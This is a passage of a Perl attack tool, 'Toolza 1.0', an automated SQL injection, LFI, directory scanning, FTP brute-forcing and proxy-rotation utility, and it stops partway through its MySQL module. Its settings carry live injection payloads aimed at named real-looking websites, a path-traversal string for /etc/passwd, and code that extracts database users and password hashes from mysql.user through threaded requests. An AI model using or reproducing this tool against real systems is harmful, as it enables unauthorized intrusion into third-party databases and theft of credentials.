V3xD

1. #!/usr/bin/perl - UTF-8 encoding
2. use threads;
3. use threads::shared;
4. use IO::Socket;
5. #use IO::Socket::SSL; # For enable HTTPS support uncomment this line
6. my $num : shared;
7. my $good : shared;
8. my $ck1 : shared;
9. ###########################################################################
10. ## ?????????? ????????? ??? ???? ??????? | Global settings for all modes ##
11. ###########################################################################
12. $test_mode = 0;# when 1 - print get/post page content in terminal0
13. $method = 0; # 1- Post; 0 - GET ????? ???????? | Post or Get method, 1-POST; 0-GET|||||SAFE POST - with $sql_post, line 27
14. $get_method = 0; # 0 - via IO::Socket, 1 - via LWP::Simple -  if can't get DATA
15. $use_proxy = 0; # 0 - ??? ??????; 1 - c ?????? | 1 -Use proxy; 0 - No proxy
16. $proxy = "proxy.txt"; # ???? ? ???????? | Proxy file
17. $use_socks = 0; # 0 - ??? socks; 1 - c socks | 1 -Use socks; 0 - No socks
18. $socks_file = "socks.txt";# ???? ? SOCKS | SOCKS file (SOCKS4-5 supported, no authorization)
19. $kol_threads = 10; # ???-?? ???????, ????????????? -10 | Number of threads - 10 recommended
20. $timeout = 20; # ??????? ? ???????? | Timeout in seconds
21. $cookie = 'PHPSESSID=qeqp01ccc006ra904qtaouoct0;b=b'; # ???? ??? ??? - ????????? "" | If no coockie set ""
22. $https_mode_auth = 1; # 1 - whith authorization, 0 - no
23. $https_auth_script_path = "/signin.php";
24. $https_auth_post_data = "uname=qqq&passwd=123&Submit=Sign+In";
25. $referer = "http://google.com"; # ???????, ???? ??? ????????? "" | If no referer set ""
26. $user_agent = "Mozilla/5.0 (Windows NT 5.1; U; ru; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 10.10"; # ???? ?????, ???? ??? ????????? "" | If no user agent set ""
27. $sql_post = ""; # SQLi Post parameter
28. #$sql_header = "Accept-Language: 1+and+1=1+or";# SQLi Header parametr (include COOKIE), if present before - comment it with "#"
29. $http_protocol = 1; # 0 - HTTP/1.0; 1 - HTTP/1.1; Default - 1
30. $pause = 0; # ????? ????? ????????? ? ???????? | Pause between requests in seconds
31. #########################################################################################################################################
32. ## ???????? ????????? MySQL - ?????? ?????????????? ???? ????????? " ^ " |MySql Basic options -  print " ^ " instead of printable field #
33. #########################################################################################################################################
34. $source_sql = "http://www.lebow.drexel.edu/Newsroom/Newsletters/index.php?cid=(1)and(0)union+select+1,2,3,^,5,6,7,8,9,10,11,12";
35. $filtr = "--+"; # close SQL
36. $plus = "+"; # /**/,%20,%2b & etc.
37. $limit = 0; # 0 - no limit; 1 - limit+0,1; 2 - limit+1,1
38. $unhex = 0; # unhex(hex(DATA))); 0 - disable; 1 - enable
39. $aes = 0; # AES_DECRYPT(AES_ENCRYPT(DATA),x071),x071); 0 - disable; 1 - enable
40. $aes_key = "0x71"; # AES key
41. ######################################
42. ## MySql4 brute # URL = $source_sql ##
43. ######################################
44. $source_table_list = "source_table_list.txt"; # ????-??????? ??? ????? ?????? ? MySql4
45. $source_column_list = "source_column_list.txt"; # ????-??????? ??? ????? ??????? ? MySql4
46. ######################################
47. ## Site Scanner for folders & files ##
48. ######################################
49. $scan_url = "site.com"; # ??? ????? ? ?????
50. $folder_list = "scaner_folder_list.txt"; # ????-??????? ??? ??????? ?????/??????
51. $error_list = "scaner_errors_list.txt"; # ???? c ???????? ??????? ??????? ??? ???????????? ??????? ?????/?????
52. ###################################
53. ## LFI/READER/Load_file() bruter ##
54. ##########################################################################################################
55. # LFI/READER/Load_file, ?tc/passwd ???????? ?? " ^ " , ??? ? ? load_file('/etc/passwd') = load_file('/^')#
56. # ??? ? load_file(0x2f6574632f706173737764) = load_file(^)                                               #
57. ##########################################################################################################
58. $lrl_url = "http://dominionpropertymanagement.com/index.php?option=com_propiedades&controller=../../../../../../../../../../../^%00";
59. $lrl_error_message = "require_once"; # ??????? (????? ???????), ??????? ?????, ???? ?????? ???????????? ??????|Message when wrong
60. $lrl_list = "logs.txt"; # ????-??????? ??? ??????? ?????/?????? | File with paths/files
61. ################################################################################
62. ## Blind SQL-injection ????????? - ??????? +and+mid(version(),1,1)=5--+ ##
63. ################################################################################
64. $bl_mode = 1; # mode of blind sql injection:
65. #-----------------------------------------------------------------------------------------------------------------
66. # mode 0 example - http://site.com/index.php?id=1+and+mid(version(),1,1)=5--+
67. #in script:
68. #$bl_url = "http://site.com/index.php?id=1";
69. #$bl_filtr = "--+";
70. #$bl_plus = "+";
71. #$bl_error = "here_wrong_message";
72. #$bl_error_type = 0;
73. #-----------------------------------------------------------------------------------------------------------------
74. # mode 1 example - http://site.com/index.php?id=1+and+1=if((select+mid(version(),1,1)=5),1,(select+1+union+select+2))
75. #in script:
76. #$bl_url = "http://site.com/index.php?id=1+and+1=if((select";
77. #$bl_filtr = "),1,(select+1+union+select+2))";
78. #$bl_plus = "+";
79. #$bl_error = "here_wrong_message";
80. #$bl_error_type = 0;
81. #-----------------------------------------------------------------------------------------------------------------
82. $bl_url = "http://www.flygo.ru/1'or"; # url
83. $bl_filtr = "--'"; # close SQL
84. $bl_plus = "+"; # /**/,%20,%2b & etc.
85. $bl_error = '???????'; # ????? ????????????? ???????????/????????????? ??????? | Message when wrong/right query
86. #$bl_error = 'height="45"'; # ????? ????????????? ???????????/????????????? ??????? | Message when wrong/right query
87. $bl_error_type = 0; # ??? ?????? ??????????????, 1 - ????? ?????? ??????????, 0 - ????? ?????? ???????????? | Type of message: 1 - when right query, 0 - when wrong query
88. $bl_your_query = ""; #example - concat_ws(0x3a,table_schema,table_name)
89. $bl_from = "";#without LIMIT [auto count]!!! Example: +from+information_schema.tables+where+table_name+like+0x7573657273
90. ##################################################################################
91. ## NAME_CONST Blind SQL-injection ????????? - ???????? version() ??? ???? ?? "^"##
92. ##################################################################################
93. $nc_url = "http://www.montserrat.edu/galleries/montserrat/index.php?id=(select+min(@:=1)from+(select+1+union+select+2)k+group+by+concat(^,0x3a,@:=@-1))--+^"; # url
94. $nc_plus = "+"; # /**/,%20,%2b & etc.
95. #############################################################
96. ## ???????? ????????? MySQL injection column number bruter ##
97. #############################################################
98. $source_sql_c = "http://site.com/more.php?pid=4847+or+1=1";# url
99. $filtr_c = "--+"; # close SQL
100. $plus_c = "+"; # /**/,%20,%2b & etc.
101. $sql_mess = "on line 28";# ????? ????????????? ???????????/????????????? ??????? | Message when wrong number of columns
102. $sql_mess_type = 0;# ??? ?????? ??????????????, 1 - ????? ?????? ??????????, 0 - ????? ?????? ???????????? | Type of message: 1 - when right query, 0 - when wrong query
103. $sql_max_column_number = 120; # Max column number for brute
104. #############################################################################################
105. ##            FTP checker                                                                  ##
106. #############################################################################################
107. $ftp_list = "ftp.txt"; # file with unchecked ftp
108. $ftp_save = "ftp_good.txt"; # file with checked & good ftp
109. $ftp_def_port = 21; # default ftp port
110. #############################################################################################
111. ##            FTP bruter                                                                   ##
112. #############################################################################################
113. $ftp_host = "ftp.example.com"; # ftp host
114. $ftp_def_port_b = 21; # default ftp port
115. $ftp_login = ""; # when know login, passwords brute
116. $ftp_pass_file = "ftp_pass.txt"; # when know login, passwords brute
117. $ftp_pass = ""; # when know password, logins brute
118. $ftp_login_file = "ftp_login.txt"; # when know password, logins brute
119. $ftp_login_pass_file = "ftp_login_pass.txt"; # login:password brute
120. $ftp_login_pass_del = ":"; # login:password delimetr (:|; & etc)
121. #############################################################################################
122. ##            PROXY checker                                                                ##
123. #############################################################################################
124. $proxy_list = "proxy.txt"; # unchecked proxy file
125. $proxy_save = "proxy_good.txt"; # checked & good proxy file
126. #############################################################################################
127. ##            PROXY grabber                                                                ##
128. #############################################################################################
129. $proxy_site_list = "proxy_site_list.txt"; # file with sites with free proxy
130. #############################################################################################
131. ##            MSSQL injection                                                              ##
132. #############################################################################################
133. $ms_url = "http://site.com/showSubcategories.aspx?categoryid=1%20or%201="; # url
134. $ms_spase = "/**/"; #%20,%2b & etc.
135. $ms_close = ""; #close SQL
136. $ms_convert_in = 0; # 0 - don't use convert(int,(data)), 1 - use convert(int,(data))
137. ######################################################################################################################
138. ## PostgreSQL - ?????? ?????????????? ???? ????????? " ^ " | Basic options -  print " ^ " instead of printable field #
139. ######################################################################################################################
140. $p_union_select_url = "http://example.com/index.php?id=-5+null,^,null"; # url UNION+SELECT method
141. $p_subquery_url = "http://example.com/index.php?id=-5"; # url SUBQUERY method
142. $p_method = 0; # 0 - UNION+SELECT method, 1 - SUBQUERY method
143. $p_filtr = "--+"; # close SQL
144. $p_plus = "+"; # %20,%2b & etc.
145. $p_convert = "text"; # convert data type(text,int ... etc.) - for subquery method
146. #####################################################################################################
147. ##          Sybase SQL                                                                             ##
148. #####################################################################################################
149. $s_union_select_url = "http://example.com/index.php?id=-1+union+select+null,^,null"; # url UNION+SELECT method
150. $s_subquery_url = "http://example.com/index.php?id=-5"; # url SUBQUERY method
151. $s_method = 0;# 0 - UNION+SELECT method, 1 - SUBQUERY method
152. $s_filtr = "--+"; # close SQL
153. $s_plus = "+"; # /**/,%20,%2b & etc.
154. $s_convert = "numeric"; # default type to convert - numeric (for subquery method)
155. #####################################################################################################
156. ##          Ms Access & Jet SQL                                                                    ##
157. #####################################################################################################
158. $a_source_sql = "http://site.com/?l=news&o=display&page=&idx=317"; # url
159. $a_filtr = ""; # close SQL
160. $a_plus = "+"; # %20,%2b & etc.
161. $a_error_code_column_more = "80040e14"; # method ORDER BY - error code when column number is MORE
162. $a_error_code_table = "80040e37"; # error code when wrong table
163. $a_error_code_column = "80040e10"; # error code when wrong column
164. $a_max_column_number = 100; # max column number for brute
165. #######################################################################################################################
166. ## Oracle SQL - ?????? ?????????????? ???? ????????? " ^ " | Basic options -  print " ^ " instead of printable field ##
167. #######################################################################################################################
168. $o_source_sql = "http://example.com/index.php?id=-5+null,^,null"; # url
169. $o_filtr = "--+"; # close SQL
170. $o_plus = "+"; # %20,%2b & etc.
171. $o_convert = "char"; # default type to convert printable field - char
172. #######################################################################################################################
173. ## Firebird/Interbase SQL##
174. #######################################################################################################################
175. $fi_source_sql = "http://example.com/image.php?operator=2)+and+1="; # url http://example.com/image.php?operator=2)+and+1=cast(user+as+char(777))--
176. $fi_filtr = "--"; # close SQL
177. $fi_plus = "+"; # %20,%2b & etc.
178. $fi_convert = "char(777)"; # default data type - char(777)
179. #####################################################################################################
180. ## floor(rand()) MySQL## example: http://example.com/?id=1+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+ # Blind SQL inj alternative
181. #######################################################################################################################
182. $f_table = "information_schema.tables"; #  default 'information_schema.tables' if MySQL>=5 and if MySQL<5 - you must brute table_name before and print here
183. $f_url = "http://www.montserrat.edu/galleries/montserrat/index.php?id=(1)or(select(1)from"; # url
184. $f_plus = "+"; # %20,%2b & etc.
185. $f_filtr = "--"; # close SQL
186. #####################################################################################################
187. ## ???? ?????? ?? ???????, ???? ?? ?????, ??? ?????? | Don't touch anything below if you don't know what you do ##
188. ##################################################################################################################  #####################################################################################################
189. if ($method == 1) {
190.      $method = "POST";
191. } else {
192.      $method = "GET";
193. }
194. $search="+";
195. $replacement=" ";
196. sub collect {
197.  my $datass = $_[0];
198.  my $cookies = undef;
199.  while($datass =~ /Set-Cookie: (.+?)(;|\r)/igs){
200.    $cookies .= $1."; ";
201.  }
202.  return $cookies;
203. }
204. sub req {
205.  my($hosts, $paths, $types, $datas, $cookiess) = @_;
206.  my $https_sock = IO::Socket::SSL->new("$hosts:443");
207.  my $request = "$types $paths HTTP/1.1\n".
208.  "Host: $hosts\n".
209.  "Cookie: $cookiess\n";
210.  if($types eq "POST") {
211.      $request .= "Content-type: application/x-www-form-urlencoded\n".
212.      "Content-Length: ".length($datas)."\n\n".$datas;
213.  } else {
214.      $request .= "\n";
215.  }
216.  print $https_sock $request;
217.  my $answ = undef;
218.  while(my $buf = <$https_sock>) {
219.      $answ .= $buf;
220.  }
221.  return $answ;
222. }
223. $socks_check = 0;
224. $https_flag = 0;
225. $https_auth_check = 0;
226. $sql_data_flag = false;
227. my ($CRLF,$port4,$login,$pass,$sock_res);
228. $CRLF = "\015\012";
229. ($lrl_start, $lrl_end) = split (/\^/, $lrl_url);
230. $lrl_url =~ /^http:\/\/?([^\/]+)/i;
231. $host2 = $1;
232. $bl_url =~ /^http:\/\/?([^\/]+)/i;
233. $host3 = $1;
234. $lrl_url = $lrl_start . "[BRUTE]" . $lrl_end;
235. $f_url =~ /^http:\/\/?([^\/]+)/i;
236. $host13 = $1; # floor
237. $scan_url =~ /^http:\/\/?([^\/]+)/i;
238. $host1 = $1;
239. $source_sql_c =~ /^http:\/\/?([^\/]+)/i;
240. $host5 = $1;
241. ($nc_start,$nc_midle,$nc_end) = split(/\^/,$nc_url);
242. $nc_url =~ /^http:\/\/?([^\/]+)/i;
243. $host6 = $1;
244. #--- default paterns ----#
245. $ms_pattern_sys_tab = "Syntax error converting the .* value \'(.*)\' to a column of data type"; # regular expression to parse sys & tables
246. $ms_pattern_sys_tab1 = "Conversion failed when converting the .* value \'(.*)\' to data type"; # regular expression to parse sys & tables
247. $ms_pattern_columns = "Syntax error converting the .* value \'(.*)\' to a column of data type";# regular expression to parse columns from tables
248. $ms_pattern_columns1 = "Conversion failed when converting .* value \'(.*)\' to data type"; # regular expression to parse sys & tables
249. $ms_pattern_data1   = "Syntax error converting the .* value \'(.*)\' to a column of data type";# regular expression to parse DATA from columns v.1
250. $ms_pattern_data2   = "[SQL Server]Syntax error converting the .* value \'(.*)\' to a column of data type";# regular expression to parse DATA from columns v.2
251. $ms_pattern_data3 = "Conversion failed when converting .* value \'(.*)\' to data type"; # regular expression to parse sys & tables
252. $ms_url =~ /^http:\/\/?([^\/]+)/i;
253. $host7 = $1;
254. if ($p_method == 0) {
255.     ($p_sql_start, $p_sql_end) = split (/\^/, $p_union_select_url);
256.     $p_union_select_url =~ /^http:\/\/?([^\/]+)/i;
257.     $host8 = $1;
258. }
259. if ($p_method == 1) {
260.     $p_subquery_url =~ /^http:\/\/?([^\/]+)/i;
261.     $host8 = $1;
262. }
263. if ($s_method == 0) {
264.     ($ss_sql_start, $ss_sql_end) = split (/\^/, $s_union_select_url);
265.     $s_union_select_url =~ /^http:\/\/?([^\/]+)/i;
266.     $host9 = $1;
267. }
268. if ($s_method == 1) {
269.     $s_subquery_url =~ /^http:\/\/?([^\/]+)/i;
270.     $host9 = $1;
271. }
272. $p_sql_pref1 = "chr(117)||chr(115)||chr(115)||chr(114)||"; # ?? ????????
273. $p_sql_pref2 = "||chr(117)||chr(115)||chr(115)||chr(114)"; # ?? ????????
274. $s_sql_pref1 = "0x75737372||"; # ?? ????????
275. $s_sql_pref2 = "||0x75737372"; # ?? ????????
276. $a_source_sql =~ /^http:\/\/?([^\/]+)/i;
277. $host10 = $1;
278. $a_sql_pref1 = "chr(94)%2b"; # ?? ????????
279. $a_sql_pref2 = "%2bchr(94)"; # ?? ????????
280. ($o_sql_start, $o_sql_end) = split (/\^/, $o_source_sql);
281. $o_source_sql =~ /^http:\/\/?([^\/]+)/i;
282. $host11 = $1;
283. $o_sql_pref1 = "chr(117)||chr(115)||chr(115)||chr(114)||"; # ?? ????????
284. $o_sql_pref2 = "||chr(117)||chr(115)||chr(115)||chr(114)"; # ?? ????????
285. $fi_source_sql =~ /^http:\/\/?([^\/]+)/i;
286. $host12 = $1;
287. $fi_sql_pref1 = 'ascii_char(117)||ascii_char(115)||ascii_char(115)||ascii_char(114)||'; # ?? ????????
288. $fi_sql_pref2 = '||ascii_char(117)||ascii_char(115)||ascii_char(115)||ascii_char(114)'; # ?? ????????
289. print "-----------------------------------------\n";
290. $sql_pref1 = "CONCAT(0x75737372,"; # ?? ????????
291. $sql_pref2 = ",0x75737372)"; # ?? ????????
292. if ($aes == 1) {
293.      $sql_CP_start =  "AES_DECRYPT(AES_ENCRYPT(";
294.      $sql_CP_end = "," . $aes_key . ")," . $aes_key . ")";
295. }
296. if ($unhex == 1) {
297.      $sql_CP_start =  "UNHEX(HEX(";
298.      $sql_CP_end = "))";
299. }
300. if (($aes == 0) && ($unhex == 0)) {
301.      $sql_CP_start =  "";
302.      $sql_CP_end = "";
303. }
304. if ($limit == 0) {
305.      $limit =  "";
306. }
307. if ($limit == 1) {
308.      $limit =  $plus . "limit" . $plus . "0,1";
309. }
310. if ($limit == 2) {
311.      $limit =  $plus . "limit" . $plus . "1,1";
312. }
313. if ($use_proxy == 1) {
314.    print "----------------------------------------\n";
315.    print "You choose mode with proxy, try to find good in $proxy ...\n";
316.    print "Timeout = $timeout sec:\n";
317.    print "----------------------------------------\n";
318.    $proxy_flag = 0;
319.    open(FILE9, "<", $proxy);
320.    while(<FILE9>) {
321.          chomp;
322.          push(@prox, $_);
323.    }
324.    close(FILE9);
325.    $size = @prox;
326.    $i = 0;
327.    while ($i < $size) {
328.       $current_proxy = $prox[$i];
329.       ($current_proxy_host,$current_proxy_port) = split(/:/,$current_proxy);
330.       if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
331.            print "Will use --> $current_proxy_host:$current_proxy_port\n";
332.            $proxy_flag = 1;
333.            $proxy_message = "$current_proxy_host:$current_proxy_port";
334.            $i = $size;
335.       } else {
336.            print "$current_proxy_host:$current_proxy_port - Bad proxy\n";
337.       }
338.       $i++;
339.    }
340.    if ($proxy_flag == 0) {
341.         print "----------------------------------------\n";
342.         print "No good proxy in " . $proxy . ", change mode. Exit...\n";
343.         exit;
344.    }
345. } else {
346.    $proxy_message = "no";
347. }
348. $flag_check = 0;
349. print "-----------------------------------------\n";
350. print "Toolza 1.0 by Pashkela [ BugTrack Team ] (c) 2009\n";
351. START_global:
352. if ($get_method == 1) {
353.      print "------------------------------------------------------------------------------\n";
354.      print "===================> Only GET-method, no proxy, no socks! <===================\n";
355.      print "------------------------------------------------------------------------------\n";
356. }
357. print "----------------------------------------------------------\n";
358. print "               Choose mode:\n";
359. print "----------------------------------------------------------\n";
360. print "    [1]  Mysql injection\n";
361. print "    [2]  MSSQL injection\n";
362. print "    [3]  PostgreSQL injection\n";
363. print "    [4]  Sybase SQL injection\n";
364. print "    [5]  Access & Jet SQL injection\n";
365. print "    [6]  Oracle SQL injection\n";
366. print "    [7]  Firebird/Interbase SQL injection\n";
367. print "    =======================================================\n";
368. print "    [8]  LFI/Reader/Load_file() bruter\n";
369. print "    [9]  Scan site for folders & files\n";
370. print "    [10] FTP checker\n";
371. print "    [11] FTP bruter\n";
372. print "    [12] Proxy checker\n";
373. print "    [13] Proxy grabber\n";
374. print "    =======================================================\n";
375. print "    [14] Exit\n";
376. print "----------------------------------------------------------\n";
377. if($sql_post and !$sql_header){
378.    $method = "POST";
379.    $sql_flag = 1;  
380.    print "SQLi in POST parameter...\n";
381.   ($sql_start, $sql_end) = split (/\^/, $sql_post);
382.    $source_sql =~ /^http:\/\/?([^\/]+)/i;
383.    $host100 = $1; # source_sql host
384. }elsif(!$sql_post and $sql_header){      
385.    $sql_flag = 2;  
386.    print "SQLi in HEADER parameter...\n";
387.    $sql_header =~ s!\Q$search!$replacement!g;
388.    ($sql_start, $sql_end) = split (/\^/, $sql_header);
389.    $source_sql =~ /^http:\/\/?([^\/]+)/i;
390.    $host100 = $1; # source_sql host
391. }elsif($sql_post and $sql_header){
392.    print "==========================================================================\n";
393.    print "SQLi in HEADER parameter[\$sql_post] and in POST parametr[\$sql_header]\n";
394.    print "in \"Global settings\" section - don't supported, choose one, exit...\n";
395.    print "==========================================================================\n";
396.    exit;          
397. }else{
398.    print "SQLi in GET parameter...\n";
399.    $sql_flag = 0;  
400.    ($sql_start, $sql_end) = split (/\^/, $source_sql);
401.    $source_sql =~ /^http:\/\/?([^\/]+)/i;
402.    $host100 = $1; # source_sql host
403. }
404. $choice = <STDIN>;
405. chomp $choice;
406. print "Your choice: $choice\n";
407. ## Mysql ###############################################################################################################
408. if ($choice == 1) {
409. START:
410. if ($source_sql =~ m/^https:\/\/?([^\/]+)/i) {
411.    $host100 = $1;
412.    $https_flag = 1;
413.    print "----------------------\n";
414.    print "HTTPS mode enabled\n";
415.    print "----------------------\n";
416. }
417. $host = $host100;
418. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
419.     print "-----------------------------------------\n";
420.     print "Authorization required, wait please....";
421.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
422.     $ck1 = collect($answ1);
423.     $https_auth_check = 1;
424.  
425.     print " DONE\n";
426.     print "-----------------------------------------\n";
427. }
428. sub ascii_to_hex($) {
429.  
430.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
431.                $str = "0x" . $str;
432.              return $str;
433.     }
434. if ($use_socks == 1 && $socks_check == 0) {
435.   $check_url = $host;
436.   our $query = "GET / HTTP/1.$http_protocol\r\n"
437.            . "Host: $check_host\r\n"
438.            . "Referer: http://" . $check_url . "\r\n"
439.            . "Accept: */*\r\n"
440.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
441.            . "Connection: close\r\n\r\n";
442.    print "----------------------------------------\n";
443.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
444.    print "Timeout = 5 sec:\n";
445.    print "----------------------------------------\n";
446.    $socks_check = 0;
447.    $check_socks = socks_check();
448.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
449.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
450.   if ($current_proxy_host) {
451.      $socks_check = 1;
452.      print "Will use --> $proxy_message\n";
453.   } else {
454.      $socks_check = 0;
455.      $proxy_message = "No";
456.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
457.   }
458. }
459. print "----------------------------------------------------------\n";
460. print "               Choose mode:\n";
461. print "----------------------------------------------------------\n";
462. print "    [1]  Mysql inj system information\n";
463. print "    [2]  Mysql inj get DB-names from information_schema.schemata\n";
464. print "    [3]  Mysql inj get tables from DB-name\n";
465. print "    [4]  Mysql inj get column_name from tables from DB-name\n";
466. print "    [5]  Mysql inj get tables from information_schema (current DB)\n";
467. print "    [6]  Mysql inj get column_name from table (current DB)\n";
468. print "    [7]  Mysql inj get data from columns\n";
469. print "    [8]  Mysql inj brute tables & columns\n";
470. print "    [9]  Mysql inj column number bruter\n";
471. print "    [10] Mysql inj Blind\n";
472. print "    [11] Mysql inj NAME_CONST\n";
473. print "    [12] Mysql inj floor(rand())\n";
474. print "    [13] Mysql inj LOAD_FILE (file_priv = Y)\n";
475. print "----------------------------------------------------------\n";
476. print "    [14]  Main menu\n";
477. print "----------------------------------------------------------\n";
478. $choice = <STDIN>;
479. chomp $choice;
480. print "Your choice: $choice\n";
481. if ($choice == 1) {
482.      open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
483.      if ($flag_check == 0) {
484.            $url0 = $sql_start . $sql_CP_start . "SQL" . $sql_CP_end . $sql_end . $limit . $filtr;
485.            $flag_check = 1;
486.            print "-----------------------------------------\n";
487.            print "Check basic options:\n";
488.            print "-------------------\n";
489.            print "$url0\n";
490.            print FILE "$url0\n";
491.      }
492.      #### ?????? ?????? #####################################################
493.      $url1 = $sql_start . $sql_CP_start . $sql_pref1 .  "concat(0x7665723a,version())" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
494.      #### ?????? ??? ???? #####################################################
495.      $url2 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x626173653a,database())" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
496.      #### ?????? ????? #####################################################
497.      $url3 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x757365723a,user())" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
498.      #### ?????? @@basedir #####################################################
499.      $url4 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x626173656469723a," .  "@@" . "basedir)" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
500.      #### ?????? @@datadir #####################################################
501.      $url5 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x646174616469723a," .  "@@" . "datadir)" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
502.      #### ?????? @@tmpdir #####################################################
503.      $url6 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x746d706469723a," .  "@@" . "tmpdir)" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
504.      #### ?????? @@version_compile_os #####################################################
505.      $url7 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6f733a," .  "@@" . "version_compile_os)" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
506.      #### ?????? mysql.user #####################################################
507.      $url8 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6d7973716c2e757365723a,user)" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "mysql.user" . $limit . $filtr;
508.      #### ?????? mysql.password #####################################################
509.      $url9 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6d7973716c2e70617373776f72643a,password)" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "mysql.user" . $limit . $filtr;
510.      #### ?????? file_priv #####################################################
511.      $url10 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x66696c655f707269763a,file_priv)" . $sql_pref2 . $sql_CP_end . $sql_end . $plus ."from" . $plus . "mysql.user" . $plus . "where" . $plus . "user=user" . $limit . $filtr;
512.      #####################################################################
513.      $thr = $kol_threads; # ???-?? ???????
514.      $num = -1; # ?? ????????
515.      print "-----------------------------------------\n";
516.      print "System information:\n";
517.      print "-----------------------------------------\n";
518.      print FILE  "-----------------------------------------\n";
519.      print FILE  "HOST: $host\n";
520.      print FILE "-----------------------------------------\n";
521.      print FILE "System information:\n";
522.      print FILE "-----------------------------------------\n";
523.      print "Request method - $method\n";
524.      print "Threads - $kol_threads\n";
525.      print "Proxy - $proxy_message\n";
526.      print "----------------------\n";
527.      for(0..$thr) {
528.         $trl[$_] = threads->create(\&gets1);
529.      }
530.      for(0..$thr) {
531.         $trl[$_]->join;
532.      }
533.      sub gets1 {
534.         @array = ($url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11);
535.         $size = @array; #???????? ?????? ???????
536.         $| = 1;
537.         while ($num<$size) {
538.             { lock($num);
539.             $num++; }
540.             if($sql_flag == 0){
541.               $current = $array[$num];
542.               $content = scan_url();
543.             } elsif ($sql_flag == 1) {#POST
544.               $current = $source_sql;
545.               $sql_post = $array[$num];
546.               $content = scan_url_POST();
547.             } elsif($sql_flag == 2){#HEADER
548.               $current = $source_sql;
549.               $sql_header_query = $array[$num];
550.               $sql_header_query =~ s!\Q$search!$replacement!g;
551.               $content = scan_url_HEADER();
552.             }
553.             if ($content =~ m/ussr(.*?)ussr/imgs) {
554.                   print $1 . "\n";
555.                   print FILE $1 . "\n";
556.             }
557.             print $num . "\r";
558.             sleep $pause;
559.         }
560.      }
561.      print "----------\n";
562.      print "Saved in " . "z_" . $host . ".txt\n";
563.      close(FILE);
564.      goto START;
565. }
566. #### ??????? ?? ##################################################################################################
567. if ($choice == 2) {
568.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
569.      ## ???-?? ?? ? information_schema.schemata ##
570.      $url11 = $sql_start . $sql_pref1 . "count(schema_name)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . "information_schema.schemata" . $limit . $filtr; # ??????? ???-?? ??
571.      if($sql_flag == 0){
572.          $current = $url11;
573.          $content = scan_url();
574.      } elsif ($sql_flag == 1) {#POST
575.          $current = $source_sql;
576.          $sql_post = $url11;
577.          $content = scan_url_POST();
578.      } elsif($sql_flag == 2){#HEADER
579.          $current = $source_sql;
580.          $sql_header_query = $url11;
581.          $sql_header_query =~ s!\Q$search!$replacement!g;
582.          $content = scan_url_HEADER();
583.      }
584.      $bd_num = $content;
585.      $bd_num =~ m/ussr(.*?)ussr/img;
586.      $bd_num = $1;
587.      print FILE "-----------------------------------------\n";
588.      print FILE "Data bases in information_schema.schemata: $bd_num\n";
589.      print FILE "-----------------------------------------\n";
590.      print "-----------------------------------------\n";
591.      print "Data bases in information_schema.schemata - $1\n";
592.      print "-----------------------------------------\n";
593.      $url12 = $sql_start . $sql_CP_start . $sql_pref1 . "schema_name" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.schemata";
594.      $num = -1; # ?? ????????
595.      $thr = $kol_threads; # ???-?? ???????
596.      print "Request method - $method\n";
597.      print "Threads - $kol_threads\n";
598.      print "Proxy - $proxy_message\n";
599.      print "----------------------\n";
600.       for(0..$thr) {
601.          $trl[$_] = threads->create(\&gets5050);
602.      }
603.      for(0..$thr) {
604.          $trl[$_]->join;
605.      }
606.      sub gets5050 {
607.        $| = 1;
608.        while ($num<=$bd_num) {
609.          { lock($num);
610.          $num++; }
611.          if($sql_flag == 0){
612.               $current = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
613.               $content = scan_url();
614.             } elsif ($sql_flag == 1) {#POST
615.               $current = $source_sql;
616.               $sql_post = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
617.               $content = scan_url_POST();
618.             } elsif($sql_flag == 2){#HEADER
619.               $current = $source_sql;
620.               $sql_header_query = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
621.               $sql_header_query =~ s!\Q$search!$replacement!g;
622.               $content = scan_url_HEADER();
623.            }
624.          if ($content =~ m/ussr(.*?)ussr/img) {
625.                   print $1 . "\n";
626.                   print FILE $1 . "\n";
627.          }
